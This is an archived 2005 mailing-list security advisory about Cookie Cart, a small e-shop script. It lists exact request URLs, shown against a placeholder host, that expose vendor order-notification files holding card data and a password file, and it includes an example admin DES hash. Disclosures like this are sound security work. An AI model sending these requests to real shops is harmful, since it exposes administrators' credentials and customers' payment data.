Cookie Cart Default Installation Multiple Vulnerabilities

To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, sec@xxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx, alerts_advisories@xxxxxxxxxxxxxxxx
Subject: Cookie Cart Default Installation Multiple Vulnerabilities
From: SoulBlack Group <soulblacktm@xxxxxxxxx>
Date: Sat, 21 May 2005 20:15:48 -0300
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=LHnUNlKOpRj/wpSbJzCa5oqlkARulkKxt13mnSPY27HVb1GlRptrM8d8mtMSvvW5yFACPjXlbUTEZ+p7m6Ag9XGdl5MK7lbryV2Vpw6dCv9j/aBrNGslvbDJ4cEJ+xPYOz3ggk2kT6eIeHZb31B3hTl1Ljfko9dcv8c3XljbuTU=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: SoulBlack Group <soulblacktm@xxxxxxxxx>

============================================================

============================================================
Title: Cookie Cart Default Installation Multiple Vulnerabilities 
Vendor: http://www.metromkt.net/ccart
Vulnerability discovery: SoulBlack - Security Research - 
http://soulblack.com.ar 
Date: 21/05/2005
Severity: Medium. Remote users can obtain several data of Credits Cards, etc.
Affected version: Unknow
============================================================

============================================================

* Summary *

Cookie Cart Shopping is a Simple E-Shop Commerce.

-------------------------------------------------------------

* Problem Description *

Remote user can obtain Admin password and see Confidential (asi se
escribe ??) Information

-------------------------------------------------------------


* First Vulnerability *


You can see "Order Notification" list with testmy.cgi and testmy.pl

http://www.vulnerable.com/cart/cgi/testmy.cgi?testmycgi=/cart/cgi/testmy.cgi&path=/cart/dbase_ven/&run=yes

http://www.vulnerable.com/cart/dbase_ven/[vendor_#number-notification.txt]

Example:

http://www.vulnerable.com/cart/dbase_ven/vendor_10112088.txt


* Second Vulnerability *


You can read Password File (DES Encryption)

http://www.vulnerable.com/cart/data/passwd.txt

Example:

admin:aeczIj3e6GLso

-------------------------------------------------------------

* Fix *

  Use .htaccess or contact Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/cookiec_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar

Prev by Date: SQL injections in PortailPHP
Next by Date: Format string and crash in Warrior Kings 1.3 and Battles 1.23
Previous by thread: SQL injections in PortailPHP
Next by thread: Format string and crash in Warrior Kings 1.3 and Battles 1.23
Index(es):
- Date
- Thread